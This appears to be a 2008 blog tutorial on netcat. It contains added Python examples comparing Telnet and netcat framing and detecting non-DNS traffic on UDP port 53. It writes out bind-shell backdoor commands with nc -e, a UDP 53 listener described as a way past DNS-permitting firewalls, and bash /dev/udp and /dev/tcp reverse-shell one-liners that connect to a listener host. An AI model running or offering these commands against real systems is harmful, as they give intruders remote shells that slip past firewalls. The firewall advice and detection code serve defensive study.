Thursday, 31 July 2008

Testing and making connections to open ports with Netcat

  • Faster than a speeding Telnet.
  • Easy to drop with a CTRL-C
  • Handles raw data in a single bound

No, it is not a bird or a plane, it is netcat.

Netcat is far faster than Telnet because it carries none of Telnet's option negotiation and character translation. Unlike a Telnet client, netcat puts exactly the bytes you hand it on the wire and adds nothing, which is what makes it the better tool for forensic data transfers where a byte-exact copy matters.
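To make "netcat does not add characters" concrete, here is an added example (not code from the original post) that models the framing a Telnet peer puts around a payload: the option negotiation sent when a session opens and the RFC 854 rule that every data byte 0xFF must be escaped as IAC IAC. The disk-image fragment and the particular negotiation bytes are constructed for illustration; a netcat transfer of the same bytes is shown alongside for comparison.

```python
"""Why netcat, not telnet, for byte-exact transfers.

The telnet protocol is not a transparent byte pipe: the peers exchange
option-negotiation sequences (IAC DO/WILL/...) and any data byte 0xFF must
be sent escaped as IAC IAC (RFC 854).  This constructed example models that
framing so the difference from netcat's raw stream is visible.
"""
import hashlib

IAC, DONT, DO, WONT, WILL, SB, SE = 255, 254, 253, 252, 251, 250, 240
OPT_ECHO, OPT_SGA = 1, 3   # telnet option codes: ECHO, SUPPRESS-GO-AHEAD


def telnet_frame(payload: bytes, negotiate: bool = True) -> bytes:
    """Model what a telnet peer puts on the wire for `payload`.

    A typical opening negotiation (assumed for the example) is prepended and
    every 0xFF data byte is doubled, as RFC 854 requires.
    """
    out = bytearray()
    if negotiate:
        out += bytes([IAC, WILL, OPT_ECHO, IAC, WILL, OPT_SGA, IAC, DO, OPT_SGA])
    out += payload.replace(bytes([IAC]), bytes([IAC, IAC]))
    return bytes(out)


def telnet_unframe(stream: bytes) -> bytes:
    """Recover the payload from a telnet stream: drop negotiation, unescape IAC IAC.

    Handles IAC <DO|DONT|WILL|WONT> <opt>, IAC SB ... IAC SE subnegotiation
    and two-byte IAC <cmd> sequences.  A truncated sequence raises so that
    corruption is loud rather than silent.
    """
    out = bytearray()
    i, n = 0, len(stream)
    while i < n:
        b = stream[i]
        if b != IAC:
            out.append(b)
            i += 1
            continue
        if i + 1 >= n:
            raise ValueError("truncated IAC at end of stream")
        cmd = stream[i + 1]
        if cmd == IAC:                       # escaped data byte 0xFF
            out.append(IAC)
            i += 2
        elif cmd in (DO, DONT, WILL, WONT):  # three-byte option negotiation
            if i + 2 >= n:
                raise ValueError("truncated option negotiation")
            i += 3
        elif cmd == SB:                      # skip subnegotiation up to IAC SE
            end = stream.find(bytes([IAC, SE]), i + 2)
            if end < 0:
                raise ValueError("unterminated subnegotiation")
            i = end + 2
        else:                                # other two-byte command (NOP, GA, ...)
            i += 2
    return bytes(out)


def netcat_frame(payload: bytes) -> bytes:
    """Netcat adds nothing: what goes in is exactly what goes on the wire."""
    return payload


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


if __name__ == "__main__":
    # Constructed disk-image fragment with a run of 0xFF bytes (erased flash, padding).
    image = b"MBR\x00\x55\xaa" + b"\xff" * 8 + b"evidence.txt\n"
    wire_nc = netcat_frame(image)
    wire_telnet = telnet_frame(image)
    print("original :", len(image), sha256(image)[:16])
    print("netcat   :", len(wire_nc), sha256(wire_nc)[:16], "(identical)")
    print("telnet   :", len(wire_telnet), sha256(wire_telnet)[:16], "(differs)")
    print("unframed :", sha256(telnet_unframe(wire_telnet))[:16])
```

The hash of the netcat stream equals the hash of the source; the telnet stream is longer and hashes differently, and the evidence is only recovered after stripping the negotiation and unescaping. Real Telnet clients also translate carriage returns unless put into binary mode, so in practice the damage to a raw image is worse than this model shows.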

Next, Netcat can also talk UDP. This means it can serve as a simple "Telnet" style client and server even over UDP.

On the Server:
# nc -l -p [port] -e /bin/csh
or
C:\ nc -l -p [port] -e C:\windows\system32\cmd.exe

Note that -e only exists in netcat builds compiled with it (the traditional netcat's GAPING_SECURITY_HOLE option; Nmap's Ncat also supports it). Many distribution packages ship without it, in which case the listener starts but refuses the option.

So if the aim is a UDP "telnet" style listener on UDP 53, just run:
# nc -l -u -p 53 -e /bin/csh

Call it what it is: a simple backdoor.

On the Client:
# nc [ServerIPAddress] [port]

So to connect to the listener above on UDP 53 at IP address 192.168.10.123 we would use:
# nc -u 192.168.10.123 53

It is all really easy when you think about it, and that is exactly why it is SO EASY to bypass firewalls and routers that permit DNS traffic (or any other default rule) from anywhere: a listener on UDP 53 looks like a name server to a rule that only checks the port. This is why it is CRITICAL that every rule granting ANY system to ANY system access is restricted to the specific hosts, directions and services that actually need it.
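The firewall point above, as an added example that is not part of the original post: a small Python check over constructed flow records that flags UDP/53 traffic which cannot be DNS, either because it goes to a host that is not one of the sanctioned resolvers or because the first bytes of the datagram do not parse as a DNS header (RFC 1035 section 4.1.1). The resolver addresses, the Flow record layout and the sample records are assumptions for illustration; the second sample record is what a csh shell shovelled to the UDP 53 listener above would look like on the wire.

```python
"""Spotting a shell riding on UDP/53.

A rule that lets "any system" reach "any system" on UDP/53 lets a netcat
backdoor on port 53 through unnoticed.  This added check takes constructed
flow records (endpoints plus the first bytes of the datagram payload, as a
sensor would capture them) and flags traffic that is not real DNS.
"""
import struct
from dataclasses import dataclass
from typing import Dict, List

# Assumption for the example: the organisation's only sanctioned resolvers.
APPROVED_RESOLVERS = {"10.0.0.53", "10.0.1.53"}


@dataclass
class Flow:
    src: str
    dst: str
    proto: str      # "udp" or "tcp"
    dport: int
    payload: bytes  # first bytes of the first datagram (constructed here)


def looks_like_dns(payload: bytes) -> bool:
    """Cheap plausibility check on a 12-byte DNS header.

    Not a full parser: it rejects the obvious non-DNS blobs a shell emits
    (prompts, command output) while accepting ordinary queries/responses.
    Printable ASCII in the count fields always exceeds any sane count.
    """
    if len(payload) < 12:
        return False
    _id, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", payload[:12])
    opcode = (flags >> 11) & 0xF
    rcode = flags & 0xF
    if opcode not in (0, 1, 2, 4, 5):   # QUERY, IQUERY, STATUS, NOTIFY, UPDATE
        return False
    if rcode > 10:
        return False
    if opcode == 0 and qd == 0:          # a standard query/response carries a question
        return False
    if qd > 8 or an > 1000 or ns > 1000 or ar > 1000:
        return False
    return True


def flag_flow(flow: Flow) -> List[str]:
    """Return the reasons a port-53 flow is suspicious (empty list if none)."""
    reasons: List[str] = []
    if flow.dport != 53:
        return reasons
    if flow.dst not in APPROVED_RESOLVERS:
        reasons.append("port 53 to non-resolver %s" % flow.dst)
    if not looks_like_dns(flow.payload):
        reasons.append("payload is not a DNS header")
    return reasons


def audit(flows: List[Flow]) -> Dict[str, List[str]]:
    """Map 'src->dst:dport' to its reasons, for flows that were flagged."""
    findings: Dict[str, List[str]] = {}
    for f in flows:
        reasons = flag_flow(f)
        if reasons:
            findings["%s->%s:%d" % (f.src, f.dst, f.dport)] = reasons
    return findings


# Constructed sample records: a real query to the sanctioned resolver, shell
# output to the page's UDP 53 listener, a real query to an outside resolver
# (policy violation, but genuine DNS) and unrelated TLS traffic.
SAMPLE_FLOWS = [
    Flow("10.0.5.17", "10.0.0.53", "udp", 53,
         b"\x12\x34\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x07example\x03com\x00\x00\x01\x00\x01"),
    Flow("10.0.5.17", "192.168.10.123", "udp", 53,
         b"uid=0(root) gid=0(root) groups=0(root)\n"),
    Flow("10.0.5.44", "8.8.8.8", "udp", 53,
         b"\xab\xcd\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x03www\x07example\x03com\x00\x00\x01\x00\x01"),
    Flow("10.0.5.17", "10.0.0.53", "udp", 443, b"\x16\x03\x01"),
]

if __name__ == "__main__":
    for key, reasons in audit(SAMPLE_FLOWS).items():
        print(key, "->", "; ".join(reasons))
```

The header check is deliberately loose so it does not trip on legitimate resolvers; its job is to catch the interactive shell, whose first datagram is a prompt or command output, not a DNS message. Tunnels that wrap data in well-formed DNS queries need the destination check (or a resolver that logs) rather than this header test.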

Oops - I forgot to install netcat...

More on this later, but when netcat cannot be installed on a system, bash (and ksh93) can open sockets through the special paths /dev/tcp and /dev/udp. These are not device files on disk: the shell itself implements them inside redirections, so this only works when the command line is typed into bash or ksh, not csh or a minimal sh.

  • /dev/tcp/[IPaddress]/[port]
  • /dev/udp/[IPaddress]/[port]

So for our UDP 53 example this becomes:

  • /dev/udp/192.168.10.123/53

For the shell this becomes (typed at a bash prompt; the csh that gets started simply inherits the socket on its standard descriptors):

  • /bin/csh -i > /dev/tcp/[IPaddress]/[port] 0<&1 2>&1
  • /bin/csh -i > /dev/udp/[IPaddress]/[port] 0<&1 2>&1

The > connects stdout to the socket, 0<&1 duplicates that socket as stdin and 2>&1 does the same for stderr, so everything the interactive shell reads and writes goes over the connection.

And hence:

  • /bin/csh -i > /dev/udp/192.168.10.123/53 0<&1 2>&1

This shovels a shell from the target host back to the waiting netcat listener (nc -l -u -p 53 on 192.168.10.123 for the UDP case). Whatever we type at the listener runs on the target, which is exactly a reverse shell. Over UDP there is no session and no retransmission, so expect lost or reordered output on a lossy path; the TCP variant is the reliable one.
